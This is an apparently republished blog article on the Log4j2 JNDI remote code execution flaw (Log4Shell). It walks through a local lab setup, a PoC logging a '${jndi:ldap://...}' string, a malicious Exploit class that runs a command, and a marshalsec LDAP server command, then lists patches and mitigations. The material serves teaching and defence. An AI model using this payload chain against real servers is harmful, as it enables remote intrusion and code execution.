Information Security 5 min read

Apache Log4j2 Remote Code Execution Vulnerability Exploitation Guide

This article introduces Apache Log4j2, explains the remote code execution vulnerability caused by unsafe JNDI lookups, provides step‑by‑step environment setup, PoC code, exploitation instructions, and outlines official patches and temporary mitigation measures for developers and security engineers.

Architecture Digest

Dec 21, 2021

Apache Log4j2 Remote Code Execution Vulnerability Exploitation Guide

1. Introduction: Apache Log4j2 is an open‑source Java logging framework widely used in middleware, development frameworks and web applications.

2. Vulnerability Overview: The vulnerability arises from recursive lookup functionality in certain Log4j2 features; an unauthenticated attacker can send specially crafted data to achieve arbitrary code execution on the target server.

3. Affected Versions: Apache Log4j 2.x <= 2.15.0‑rc1.

4. Environment Setup: Create a new Maven project and add Log4j2 dependencies.

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>

5. Exploit PoC:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

class LogTest {
    public static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        logger.error("${jndi:ldap://localhost:8888/Exploit}");
    }
}

6. Compile a malicious class Exploit.class:

class Exploit {
    static {
        System.err.println("Pwned");
        try {
            String cmds = "calc";
            Runtime.getRuntime().exec(cmds);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

javac exp.java

7. Start a local LDAP server using marshalsec:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:7777/#Exploit" 8888

8. Run the PoC Java program; it contacts the malicious LDAP server, loads the Exploit class and executes the embedded command (e.g., launching calculator).

9. Bypass notes: Certain StrLookup variations and specially crafted query strings can bypass early RC versions; the issue was fixed in RC2.

10. Fixes: Upgrade to the latest Log4j2 version (e.g., 2.15.0‑rc2 or newer) and apply the following temporary mitigations:

Add JVM option -Dlog4j2.formatMsgNoLookups=true.

Place a log4j2.component.properties file in the classpath with log4j2.formatMsgNoLookups=true.

Use JDK 11.0.1, 8u191, 7u201, 6u211 or later.

Deploy third‑party firewall products for additional protection.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.

java Remote Code Execution Mitigation log4j2 Exploit Security Vulnerability

Written by

Architecture Digest

Focusing on Java backend development, covering application architecture from top-tier internet companies (high availability, high performance, high stability), big data, machine learning, Java architecture, and other popular fields.

0 followers

Reader feedback

How this landed with the community

Rate this article

Was this worth your time?

Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.